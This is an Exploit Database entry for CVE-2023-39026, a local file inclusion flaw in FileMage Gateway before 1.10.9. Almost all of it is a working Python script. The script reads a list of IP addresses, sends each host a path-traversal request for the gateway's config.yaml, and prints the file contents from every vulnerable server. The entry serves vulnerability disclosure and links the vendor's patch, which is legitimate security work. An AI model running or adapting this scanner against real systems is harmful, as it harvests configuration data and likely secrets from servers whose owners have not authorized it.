FileMage Gateway 1.10.9 – Local File Inclusion

• Exploit Database
• 12 阅读

• 作者： Bryce Raindayzz Harty
  日期： 2023-09-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51708/

• # Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
  # Date: 8/22/2023
  # Exploit Author: Bryce "Raindayzz" Harty 
  # Vendor Homepage: https://www.filemage.io/
  # Version: Azure Versions < 1.10.9
  # Tested on: All Azure deployments < 1.10.9 
  # CVE : CVE-2023-39026
  
  # Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
  # Patch from vendor - https://www.filemage.io/docs/updates.html
  
  import requests
  import warnings
  warnings.filterwarnings("ignore")
  def worker(url):
  response = requests.get(url, verify=False, timeout=.5)
  return response
  def main():
  listIP = []
  file_path = input("Enter the path to the file containing the IP addresses: ")
  with open(file_path, 'r') as file:
  ip_list = file.read().splitlines()
  searchString = "tls"
  for ip in ip_list:
  url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
  try:
  response = worker(url)
  #print(response.text)
  if searchString in response.text:
  print("Vulnerable IP: " + ip)
  print(response.text)
  listIP.append(ip)
  except requests.exceptions.RequestException as e:
  print(f"Error occurred for {ip}: {str(e)}")
  
  for x in listIP:
  print(x)
  if __name__ == '__main__':
  main()